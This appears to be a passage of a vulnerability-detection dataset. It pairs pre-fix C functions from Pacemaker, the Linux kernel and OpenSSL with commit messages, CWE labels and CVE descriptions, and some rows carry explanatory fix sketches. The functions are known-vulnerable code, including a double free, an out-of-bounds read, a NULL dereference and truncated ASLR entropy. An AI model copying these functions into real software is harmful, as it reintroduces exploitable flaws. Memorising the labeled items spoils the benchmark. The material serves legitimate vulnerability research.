/* Always allow new scaffolding, ie. node with no attributes or only an 'id' */
for (xIter = crm_first_attr(xml); xIter != NULL; xIter = xIter->next) {
const char *prop_name = (const char *)xIter->name;
if (strcmp(prop_name, XML_ATTR_ID) == 0) {
/* Delay the acl check */
continue;
} else if(__xml_acl_check(xml, NULL, xpf_acl_write)) {
crm_trace("Creation of %s=%s is allowed", crm_element_name(xml), ID(xml));
break;
} else {
char *path = xml_get_path(xml);
crm_trace("Cannot add new node %s at %s", crm_element_name(xml), path);
if(xml != xmlDocGetRootElement(xml->doc)) {
xmlUnlinkNode(xml);
xmlFreeNode(xml);
}
free(path);
return;
}
}
}
while (cIter != NULL) {
xmlNode *child = cIter;
cIter = __xml_next(cIter); /* In case it is free'd */
__xml_acl_post_process(child);
}
}
| 62,179,770,258,691,625,000,000,000,000,000,000,000 | xml.c | 2,819,314,212,835,514,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-1867 | Pacemaker before 1.1.13 does not properly evaluate added nodes, which allows remote read-only users to gain privileges via an acl command. | https://nvd.nist.gov/vuln/detail/CVE-2015-1867 |
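Connecting the commit message to the code: the continue in the XML_ATTR_ID branch postpones the ACL check on the theory that the node is scaffolding whose children will be checked recursively, but a childless node never gets that later check. A hedged sketch of the tightened condition; the shipped patch may phrase it differently:

            if (strcmp(prop_name, XML_ATTR_ID) == 0 && xml->children != NULL) {
                /* Delay the acl check only for true placeholders; a
                 * childless node must be evaluated immediately. */
                continue;
            } else if (__xml_acl_check(xml, NULL, xpf_acl_write)) {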
1,532 | linux | f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045 | new helper: copy_page_from_iter()
parallel to copy_page_to_iter(). pipe_write() switched to it (and became
->write_iter()).
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | pipe_write(struct kiocb *iocb, const struct iovec *_iov,
unsigned long nr_segs, loff_t ppos)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
ssize_t ret;
int do_wakeup;
struct iovec *iov = (struct iovec *)_iov;
size_t total_len;
ssize_t chars;
total_len = iov_length(iov, nr_segs);
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;
do_wakeup = 0;
ret = 0;
__pipe_lock(pipe);
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
/* We try to merge small writes */
chars = total_len & (PAGE_SIZE-1); /* size of the last buffer */
if (pipe->nrbufs && chars != 0) {
int lastbuf = (pipe->curbuf + pipe->nrbufs - 1) &
(pipe->buffers - 1);
struct pipe_buffer *buf = pipe->bufs + lastbuf;
const struct pipe_buf_operations *ops = buf->ops;
int offset = buf->offset + buf->len;
if (ops->can_merge && offset + chars <= PAGE_SIZE) {
int error, atomic = 1;
void *addr;
error = ops->confirm(pipe, buf);
if (error)
goto out;
iov_fault_in_pages_read(iov, chars);
redo1:
if (atomic)
addr = kmap_atomic(buf->page);
else
addr = kmap(buf->page);
error = pipe_iov_copy_from_user(offset + addr, iov,
chars, atomic);
if (atomic)
kunmap_atomic(addr);
else
kunmap(buf->page);
ret = error;
do_wakeup = 1;
if (error) {
if (atomic) {
atomic = 0;
goto redo1;
}
goto out;
}
buf->len += chars;
total_len -= chars;
ret = chars;
if (!total_len)
goto out;
}
}
for (;;) {
int bufs;
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
bufs = pipe->nrbufs;
if (bufs < pipe->buffers) {
int newbuf = (pipe->curbuf + bufs) & (pipe->buffers-1);
struct pipe_buffer *buf = pipe->bufs + newbuf;
struct page *page = pipe->tmp_page;
char *src;
int error, atomic = 1;
if (!page) {
page = alloc_page(GFP_HIGHUSER);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
/* Always wake up, even if the copy fails. Otherwise
* we lock up (O_NONBLOCK-)readers that sleep due to
* syscall merging.
* FIXME! Is this really true?
*/
do_wakeup = 1;
chars = PAGE_SIZE;
if (chars > total_len)
chars = total_len;
iov_fault_in_pages_read(iov, chars);
redo2:
if (atomic)
src = kmap_atomic(page);
else
src = kmap(page);
error = pipe_iov_copy_from_user(src, iov, chars,
atomic);
if (atomic)
kunmap_atomic(src);
else
kunmap(page);
if (unlikely(error)) {
if (atomic) {
atomic = 0;
goto redo2;
}
if (!ret)
ret = error;
break;
}
ret += chars;
/* Insert it into the buffer array */
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = chars;
buf->flags = 0;
if (is_packetized(filp)) {
buf->ops = &packet_pipe_buf_ops;
buf->flags = PIPE_BUF_FLAG_PACKET;
}
pipe->nrbufs = ++bufs;
pipe->tmp_page = NULL;
total_len -= chars;
if (!total_len)
break;
}
if (bufs < pipe->buffers)
continue;
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
if (do_wakeup) {
wake_up_interruptible_sync_poll(&pipe->wait, POLLIN | POLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
do_wakeup = 0;
}
pipe->waiting_writers++;
pipe_wait(pipe);
pipe->waiting_writers--;
}
out:
__pipe_unlock(pipe);
if (do_wakeup) {
wake_up_interruptible_sync_poll(&pipe->wait, POLLIN | POLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
int err = file_update_time(filp);
if (err)
ret = err;
sb_end_write(file_inode(filp)->i_sb);
}
return ret;
}
| 332,092,449,061,268,540,000,000,000,000,000,000,000 | pipe.c | 294,209,790,332,872,760,000,000,000,000,000,000,000 | [
"CWE-17"
] | CVE-2015-1805 | The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an "I/O vector array overrun." | https://nvd.nist.gov/vuln/detail/CVE-2015-1805 |
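The CVE text calls this an I/O vector array overrun: a failed atomic copy can leave the iovec cursor advanced, so the non-atomic retry resumes from mutated state. A generic sketch of the snapshot-and-rewind discipline that avoids it (hypothetical types, not the pipe code):

#include <string.h>
#include <sys/uio.h>

struct cursor { const struct iovec *iov; size_t off; };

/* Snapshot the cursor before the first attempt; if that attempt fails
 * half-way, rewind before retrying so the copy never walks past the
 * caller's buffers. */
static void copy_retry_safe(char *dst, struct cursor *cur, size_t n)
{
	struct cursor snap = *cur;	/* state before any attempt */

	/* ...a failed first attempt may have mutated *cur... */
	*cur = snap;			/* rewind, then redo */
	memcpy(dst, (const char *)cur->iov->iov_base + cur->off, n);
	cur->off += n;
}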
1,534 | openssl | cd30f03ac5bf2962f44bd02ae8d88245dff2f12c | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/cd30f03ac5bf2962f44bd02ae8d88245dff2f12c | Canonicalise input in CMS_verify.
If content is detached and not binary mode, translate the input to
CRLF format. Before this change the input was verified verbatim,
which led to a discrepancy between sign and verify. | 1 | static void do_free_upto(BIO *f, BIO *upto)
{
if (upto)
{
BIO *tbio;
do
{
tbio = BIO_pop(f);
BIO_free(f);
f = tbio;
}
while (f != upto);
}
else
BIO_free_all(f);
}
| 77,045,330,790,459,330,000,000,000,000,000,000,000 | None | null | [
"CWE-399"
] | CVE-2015-1792 | The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function. | https://nvd.nist.gov/vuln/detail/CVE-2015-1792 |
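The do/while above only stops when it reaches upto, so if a NULL BIO makes the chain shorter than expected, BIO_pop(NULL) keeps returning NULL and the loop never exits. A self-contained sketch of the defensive termination (generic list types, freeing elided):

#include <stddef.h>

struct node { struct node *next; };

static struct node *pop(struct node *n)
{
	return n ? n->next : NULL;
}

/* Stops on NULL as well as on 'upto', so a chain that never contains
 * 'upto' terminates instead of spinning on pop(NULL). */
static void free_upto(struct node *f, struct node *upto)
{
	while (f != NULL && f != upto)
		f = pop(f);	/* the actual free is elided here */
}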
1,535 | openssl | 98ece4eebfb6cd45cc8d550c6ac0022965071afc | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/98ece4eebfb6cd45cc8d550c6ac0022965071afc | Fix race condition in NewSessionTicket
If a NewSessionTicket is received by a multi-threaded client when
attempting to reuse a previous ticket then a race condition can occur
potentially leading to a double free of the ticket data.
CVE-2015-1791
This also fixes RT#3808 where a session ID is changed for a session already
in the client session cache. Since the session ID is the key to the cache
this breaks the cache access.
Parts of this patch were inspired by this Akamai change:
https://github.com/akamai/openssl/commit/c0bf69a791239ceec64509f9f19fcafb2461b0d3
Reviewed-by: Rich Salz <rsalz@openssl.org> | 1 | int ssl3_get_new_session_ticket(SSL *s)
{
int ok, al, ret = 0, ticklen;
long n;
const unsigned char *p;
unsigned char *d;
n = s->method->ssl_get_message(s,
SSL3_ST_CR_SESSION_TICKET_A,
SSL3_ST_CR_SESSION_TICKET_B,
SSL3_MT_NEWSESSION_TICKET, 16384, &ok);
if (!ok)
return ((int)n);
if (n < 6) {
/* need at least ticket_lifetime_hint + ticket length */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, SSL_R_LENGTH_MISMATCH);
goto f_err;
}
p = d = (unsigned char *)s->init_msg;
n2l(p, s->session->tlsext_tick_lifetime_hint);
n2s(p, ticklen);
/* ticket_lifetime_hint + ticket_length + ticket */
if (ticklen + 6 != n) {
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, SSL_R_LENGTH_MISMATCH);
goto f_err;
}
OPENSSL_free(s->session->tlsext_tick);
s->session->tlsext_ticklen = 0;
s->session->tlsext_tick = OPENSSL_malloc(ticklen);
if (!s->session->tlsext_tick) {
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, ERR_R_MALLOC_FAILURE);
goto err;
}
memcpy(s->session->tlsext_tick, p, ticklen);
s->session->tlsext_ticklen = ticklen;
/*
* There are two ways to detect a resumed ticket session. One is to set
* an appropriate session ID and then the server must return a match in
* ServerHello. This allows the normal client session ID matching to work
* and we know much earlier that the ticket has been accepted. The
* other way is to set zero length session ID when the ticket is
* presented and rely on the handshake to determine session resumption.
* We choose the former approach because this fits in with assumptions
 * elsewhere in OpenSSL. The session ID is set to the SHA256 (or SHA1 if
 * SHA256 is disabled) hash of the ticket.
*/
EVP_Digest(p, ticklen,
s->session->session_id, &s->session->session_id_length,
EVP_sha256(), NULL);
ret = 1;
return (ret);
f_err:
ssl3_send_alert(s, SSL3_AL_FATAL, al);
err:
s->state = SSL_ST_ERR;
return (-1);
}
| 136,608,154,302,472,780,000,000,000,000,000,000,000 | None | null | [
"CWE-362"
] | CVE-2015-1791 | Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier. | https://nvd.nist.gov/vuln/detail/CVE-2015-1791 |
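The double free arises when two threads both replace s->session->tlsext_tick at once. A minimal sketch of the serialize-then-swap shape that avoids it, assuming a pthread mutex guards the session (the real fix reworks session handling rather than adding this exact lock):

#include <pthread.h>
#include <stdlib.h>
#include <string.h>

struct session {
	pthread_mutex_t lock;
	unsigned char *tick;
	size_t ticklen;
};

/* Free+replace happens under the lock, so the old ticket buffer is
 * released exactly once even with concurrent writers. */
static int set_ticket(struct session *s, const unsigned char *p, size_t n)
{
	unsigned char *fresh = malloc(n);

	if (fresh == NULL)
		return 0;
	memcpy(fresh, p, n);
	pthread_mutex_lock(&s->lock);
	free(s->tick);
	s->tick = fresh;
	s->ticklen = n;
	pthread_mutex_unlock(&s->lock);
	return 1;
}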
1,536 | openssl | 59302b600e8d5b77ef144e447bb046fd7ab72686 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/59302b600e8d5b77ef144e447bb046fd7ab72686 | PKCS#7: Fix NULL dereference with missing EncryptedContent.
CVE-2015-1790
Reviewed-by: Rich Salz <rsalz@openssl.org> | 1 | BIO *PKCS7_dataDecode(PKCS7 *p7, EVP_PKEY *pkey, BIO *in_bio, X509 *pcert)
{
int i, j;
BIO *out = NULL, *btmp = NULL, *etmp = NULL, *bio = NULL;
X509_ALGOR *xa;
ASN1_OCTET_STRING *data_body = NULL;
const EVP_MD *evp_md;
const EVP_CIPHER *evp_cipher = NULL;
EVP_CIPHER_CTX *evp_ctx = NULL;
X509_ALGOR *enc_alg = NULL;
STACK_OF(X509_ALGOR) *md_sk = NULL;
STACK_OF(PKCS7_RECIP_INFO) *rsk = NULL;
PKCS7_RECIP_INFO *ri = NULL;
unsigned char *ek = NULL, *tkey = NULL;
int eklen = 0, tkeylen = 0;
if (p7 == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_INVALID_NULL_POINTER);
return NULL;
}
if (p7->d.ptr == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_NO_CONTENT);
return NULL;
}
i = OBJ_obj2nid(p7->type);
p7->state = PKCS7_S_HEADER;
switch (i) {
case NID_pkcs7_signed:
data_body = PKCS7_get_octet_string(p7->d.sign->contents);
if (!PKCS7_is_detached(p7) && data_body == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_INVALID_SIGNED_DATA_TYPE);
goto err;
}
md_sk = p7->d.sign->md_algs;
break;
case NID_pkcs7_signedAndEnveloped:
rsk = p7->d.signed_and_enveloped->recipientinfo;
md_sk = p7->d.signed_and_enveloped->md_algs;
data_body = p7->d.signed_and_enveloped->enc_data->enc_data;
enc_alg = p7->d.signed_and_enveloped->enc_data->algorithm;
evp_cipher = EVP_get_cipherbyobj(enc_alg->algorithm);
if (evp_cipher == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_UNSUPPORTED_CIPHER_TYPE);
goto err;
}
break;
case NID_pkcs7_enveloped:
rsk = p7->d.enveloped->recipientinfo;
enc_alg = p7->d.enveloped->enc_data->algorithm;
data_body = p7->d.enveloped->enc_data->enc_data;
evp_cipher = EVP_get_cipherbyobj(enc_alg->algorithm);
if (evp_cipher == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_UNSUPPORTED_CIPHER_TYPE);
goto err;
}
break;
default:
PKCS7err(PKCS7_F_PKCS7_DATADECODE, PKCS7_R_UNSUPPORTED_CONTENT_TYPE);
goto err;
}
/* We will be checking the signature */
if (md_sk != NULL) {
for (i = 0; i < sk_X509_ALGOR_num(md_sk); i++) {
xa = sk_X509_ALGOR_value(md_sk, i);
if ((btmp = BIO_new(BIO_f_md())) == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, ERR_R_BIO_LIB);
goto err;
}
j = OBJ_obj2nid(xa->algorithm);
evp_md = EVP_get_digestbynid(j);
if (evp_md == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_UNKNOWN_DIGEST_TYPE);
goto err;
}
BIO_set_md(btmp, evp_md);
if (out == NULL)
out = btmp;
else
BIO_push(out, btmp);
btmp = NULL;
}
}
if (evp_cipher != NULL) {
if ((etmp = BIO_new(BIO_f_cipher())) == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE, ERR_R_BIO_LIB);
goto err;
}
/*
* It was encrypted, we need to decrypt the secret key with the
* private key
*/
/*
* Find the recipientInfo which matches the passed certificate (if
* any)
*/
if (pcert) {
for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
if (!pkcs7_cmp_ri(ri, pcert))
break;
ri = NULL;
}
if (ri == NULL) {
PKCS7err(PKCS7_F_PKCS7_DATADECODE,
PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE);
goto err;
}
}
/* If we haven't got a certificate try each ri in turn */
if (pcert == NULL) {
/*
* Always attempt to decrypt all rinfo even after success as a
* defence against MMA timing attacks.
*/
for (i = 0; i < sk_PKCS7_RECIP_INFO_num(rsk); i++) {
ri = sk_PKCS7_RECIP_INFO_value(rsk, i);
if (pkcs7_decrypt_rinfo(&ek, &eklen, ri, pkey) < 0)
goto err;
ERR_clear_error();
}
} else {
/* Only exit on fatal errors, not decrypt failure */
if (pkcs7_decrypt_rinfo(&ek, &eklen, ri, pkey) < 0)
goto err;
ERR_clear_error();
}
evp_ctx = NULL;
BIO_get_cipher_ctx(etmp, &evp_ctx);
if (EVP_CipherInit_ex(evp_ctx, evp_cipher, NULL, NULL, NULL, 0) <= 0)
goto err;
if (EVP_CIPHER_asn1_to_param(evp_ctx, enc_alg->parameter) < 0)
goto err;
/* Generate random key as MMA defence */
tkeylen = EVP_CIPHER_CTX_key_length(evp_ctx);
tkey = OPENSSL_malloc(tkeylen);
if (!tkey)
goto err;
if (EVP_CIPHER_CTX_rand_key(evp_ctx, tkey) <= 0)
goto err;
if (ek == NULL) {
ek = tkey;
eklen = tkeylen;
tkey = NULL;
}
if (eklen != EVP_CIPHER_CTX_key_length(evp_ctx)) {
/*
* Some S/MIME clients don't use the same key and effective key
* length. The key length is determined by the size of the
* decrypted RSA key.
*/
if (!EVP_CIPHER_CTX_set_key_length(evp_ctx, eklen)) {
/* Use random key as MMA defence */
OPENSSL_clear_free(ek, eklen);
ek = tkey;
eklen = tkeylen;
tkey = NULL;
}
}
/* Clear errors so we don't leak information useful in MMA */
ERR_clear_error();
if (EVP_CipherInit_ex(evp_ctx, NULL, NULL, ek, NULL, 0) <= 0)
goto err;
OPENSSL_clear_free(ek, eklen);
ek = NULL;
OPENSSL_clear_free(tkey, tkeylen);
tkey = NULL;
if (out == NULL)
out = etmp;
else
BIO_push(out, etmp);
etmp = NULL;
}
if (PKCS7_is_detached(p7) || (in_bio != NULL)) {
bio = in_bio;
} else {
if (data_body->length > 0)
bio = BIO_new_mem_buf(data_body->data, data_body->length);
else {
bio = BIO_new(BIO_s_mem());
BIO_set_mem_eof_return(bio, 0);
}
if (bio == NULL)
goto err;
}
BIO_push(out, bio);
bio = NULL;
return out;
err:
OPENSSL_clear_free(ek, eklen);
OPENSSL_clear_free(tkey, tkeylen);
BIO_free_all(out);
BIO_free_all(btmp);
BIO_free_all(etmp);
BIO_free_all(bio);
return NULL;
}
| 294,269,827,177,663,870,000,000,000,000,000,000,000 | None | null | [
"CWE-703"
] | CVE-2015-1790 | The PKCS7_dataDecode function in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data. | https://nvd.nist.gov/vuln/detail/CVE-2015-1790 |
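The crash site is the unconditional data_body->length above: EncryptedContent is OPTIONAL in the ASN.1, so data_body can legally be NULL. A tiny sketch of the missing check, with a stand-in type:

#include <stddef.h>

struct octet_string { unsigned char *data; int length; };

/* Treat the OPTIONAL content as absent-able; this is the shape of the
 * NULL check the upstream fix adds before touching length/data. */
static int content_length(const struct octet_string *body)
{
	if (body == NULL)
		return -1;	/* reject instead of dereferencing */
	return body->length;
}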
1,537 | openssl | f48b83b4fb7d6689584cf25f61ca63a4891f5b11 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/f48b83b4fb7d6689584cf25f61ca63a4891f5b11 | Fix length checks in X509_cmp_time to avoid out-of-bounds reads.
Also tighten X509_cmp_time to reject more than three fractional
seconds in the time; and to reject trailing garbage after the offset.
CVE-2015-1789
Reviewed-by: Viktor Dukhovni <viktor@openssl.org>
Reviewed-by: Richard Levitte <levitte@openssl.org> | 1 | int X509_cmp_time(const ASN1_TIME *ctm, time_t *cmp_time)
{
char *str;
ASN1_TIME atm;
long offset;
char buff1[24], buff2[24], *p;
int i, j;
p = buff1;
i = ctm->length;
str = (char *)ctm->data;
if (ctm->type == V_ASN1_UTCTIME) {
if ((i < 11) || (i > 17))
return 0;
memcpy(p, str, 10);
p += 10;
str += 10;
} else {
if (i < 13)
return 0;
memcpy(p, str, 12);
p += 12;
str += 12;
}
if ((*str == 'Z') || (*str == '-') || (*str == '+')) {
*(p++) = '0';
*(p++) = '0';
} else {
*(p++) = *(str++);
*(p++) = *(str++);
/* Skip any fractional seconds... */
if (*str == '.') {
str++;
while ((*str >= '0') && (*str <= '9'))
str++;
}
}
*(p++) = 'Z';
*(p++) = '\0';
if (*str == 'Z')
offset = 0;
else {
if ((*str != '+') && (*str != '-'))
return 0;
offset = ((str[1] - '0') * 10 + (str[2] - '0')) * 60;
offset += (str[3] - '0') * 10 + (str[4] - '0');
if (*str == '-')
offset = -offset;
}
atm.type = ctm->type;
atm.flags = 0;
atm.length = sizeof(buff2);
atm.data = (unsigned char *)buff2;
if (X509_time_adj(&atm, offset * 60, cmp_time) == NULL)
return 0;
if (ctm->type == V_ASN1_UTCTIME) {
i = (buff1[0] - '0') * 10 + (buff1[1] - '0');
if (i < 50)
i += 100; /* cf. RFC 2459 */
j = (buff2[0] - '0') * 10 + (buff2[1] - '0');
if (j < 50)
j += 100;
if (i < j)
return -1;
if (i > j)
return 1;
}
i = strcmp(buff1, buff2);
if (i == 0) /* wait a second then return younger :-) */
return -1;
else
return i;
}
| 277,602,867,865,507,800,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2015-1789 | The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback. | https://nvd.nist.gov/vuln/detail/CVE-2015-1789 |
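buff1[24] is filled from ctm->data with only coarse length checks, so a short or oddly formed ASN1_TIME can drive the parser past its input. A hedged sketch of stricter validation before any copy (not the upstream patch, which also tightens fractional-second and trailing-garbage handling):

static int utc_prefix_ok(const char *str, int len)
{
	int i;

	if (len < 11 || len > 17)
		return 0;
	for (i = 0; i < 10; i++)	/* YYMMDDHHMM must be digits */
		if (str[i] < '0' || str[i] > '9')
			return 0;
	return 1;
}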
1,538 | linux | 4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | x86, mm/ASLR: Fix stack randomization on 64-bit systems
The issue is that the stack for processes is not properly randomized on
64 bit architectures due to an integer overflow.
The affected function is randomize_stack_top() in file
"fs/binfmt_elf.c":
static unsigned long randomize_stack_top(unsigned long stack_top)
{
unsigned int random_variable = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
random_variable = get_random_int() & STACK_RND_MASK;
random_variable <<= PAGE_SHIFT;
}
#ifdef CONFIG_STACK_GROWSUP
	return PAGE_ALIGN(stack_top) + random_variable;
#else
	return PAGE_ALIGN(stack_top) - random_variable;
#endif
}
Note that, it declares the "random_variable" variable as "unsigned int".
Since the result of the shifting operation between STACK_RND_MASK (which
is 0x3fffff on x86_64, 22 bits) and PAGE_SHIFT (which is 12 on x86_64):
random_variable <<= PAGE_SHIFT;
then the two leftmost bits are dropped when storing the result in the
"random_variable". This variable shall be at least 34 bits long to hold
the (22+12) result.
These two dropped bits have an impact on the entropy of process stack.
Concretely, the total stack entropy is reduced by a factor of four:
from 2^30 down to 2^28 (one fourth of the expected entropy).
This patch restores the entropy by correcting the types involved
in the operations in the functions randomize_stack_top() and
stack_maxrandom_size().
The successful fix can be tested with:
$ for i in `seq 1 10`; do cat /proc/self/maps | grep stack; done
7ffeda566000-7ffeda587000 rw-p 00000000 00:00 0 [stack]
7fff5a332000-7fff5a353000 rw-p 00000000 00:00 0 [stack]
7ffcdb7a1000-7ffcdb7c2000 rw-p 00000000 00:00 0 [stack]
7ffd5e2c4000-7ffd5e2e5000 rw-p 00000000 00:00 0 [stack]
...
Once corrected, the leading bytes should be between 7ffc and 7fff,
rather than always being 7fff.
Signed-off-by: Hector Marco-Gisbert <hecmargi@upv.es>
Signed-off-by: Ismael Ripoll <iripoll@upv.es>
[ Rebased, fixed 80 char bugs, cleaned up commit message, added test example and CVE ]
Signed-off-by: Kees Cook <keescook@chromium.org>
Cc: <stable@vger.kernel.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Fixes: CVE-2015-1593
Link: http://lkml.kernel.org/r/20150214173350.GA18393@www.outflux.net
Signed-off-by: Borislav Petkov <bp@suse.de> | 1 | static unsigned int stack_maxrandom_size(void)
{
unsigned int max = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
}
return max;
}
| 221,663,256,924,278,800,000,000,000,000,000,000,000 | mmap.c | 64,657,617,513,672,540,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-1593 | The stack randomization feature in the Linux kernel before 3.19.1 on 64-bit platforms uses incorrect data types for the results of bitwise left-shift operations, which makes it easier for attackers to bypass the ASLR protection mechanism by predicting the address of the top of the stack, related to the randomize_stack_top function in fs/binfmt_elf.c and the stack_maxrandom_size function in arch/x86/mm/mmap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-1593 |
1,539 | linux | 4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 | x86, mm/ASLR: Fix stack randomization on 64-bit systems
The issue is that the stack for processes is not properly randomized on
64 bit architectures due to an integer overflow.
The affected function is randomize_stack_top() in file
"fs/binfmt_elf.c":
static unsigned long randomize_stack_top(unsigned long stack_top)
{
unsigned int random_variable = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
random_variable = get_random_int() & STACK_RND_MASK;
random_variable <<= PAGE_SHIFT;
}
#ifdef CONFIG_STACK_GROWSUP
	return PAGE_ALIGN(stack_top) + random_variable;
#else
	return PAGE_ALIGN(stack_top) - random_variable;
#endif
}
Note that, it declares the "random_variable" variable as "unsigned int".
Since the result of the shifting operation between STACK_RND_MASK (which
is 0x3fffff on x86_64, 22 bits) and PAGE_SHIFT (which is 12 on x86_64):
random_variable <<= PAGE_SHIFT;
then the two leftmost bits are dropped when storing the result in the
"random_variable". This variable shall be at least 34 bits long to hold
the (22+12) result.
These two dropped bits have an impact on the entropy of process stack.
Concretely, the total stack entropy is reduced by a factor of four:
from 2^30 down to 2^28 (one fourth of the expected entropy).
This patch restores the entropy by correcting the types involved
in the operations in the functions randomize_stack_top() and
stack_maxrandom_size().
The successful fix can be tested with:
$ for i in `seq 1 10`; do cat /proc/self/maps | grep stack; done
7ffeda566000-7ffeda587000 rw-p 00000000 00:00 0 [stack]
7fff5a332000-7fff5a353000 rw-p 00000000 00:00 0 [stack]
7ffcdb7a1000-7ffcdb7c2000 rw-p 00000000 00:00 0 [stack]
7ffd5e2c4000-7ffd5e2e5000 rw-p 00000000 00:00 0 [stack]
...
Once corrected, the leading bytes should be between 7ffc and 7fff,
rather than always being 7fff.
Signed-off-by: Hector Marco-Gisbert <hecmargi@upv.es>
Signed-off-by: Ismael Ripoll <iripoll@upv.es>
[ Rebased, fixed 80 char bugs, cleaned up commit message, added test example and CVE ]
Signed-off-by: Kees Cook <keescook@chromium.org>
Cc: <stable@vger.kernel.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Fixes: CVE-2015-1593
Link: http://lkml.kernel.org/r/20150214173350.GA18393@www.outflux.net
Signed-off-by: Borislav Petkov <bp@suse.de> | 1 | static unsigned long randomize_stack_top(unsigned long stack_top)
{
unsigned int random_variable = 0;
if ((current->flags & PF_RANDOMIZE) &&
!(current->personality & ADDR_NO_RANDOMIZE)) {
random_variable = get_random_int() & STACK_RND_MASK;
random_variable <<= PAGE_SHIFT;
}
#ifdef CONFIG_STACK_GROWSUP
return PAGE_ALIGN(stack_top) + random_variable;
#else
return PAGE_ALIGN(stack_top) - random_variable;
#endif
}
| 272,678,573,193,334,060,000,000,000,000,000,000,000 | binfmt_elf.c | 233,173,923,575,517,170,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-1593 | The stack randomization feature in the Linux kernel before 3.19.1 on 64-bit platforms uses incorrect data types for the results of bitwise left-shift operations, which makes it easier for attackers to bypass the ASLR protection mechanism by predicting the address of the top of the stack, related to the randomize_stack_top function in fs/binfmt_elf.c and the stack_maxrandom_size function in arch/x86/mm/mmap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-1593 |
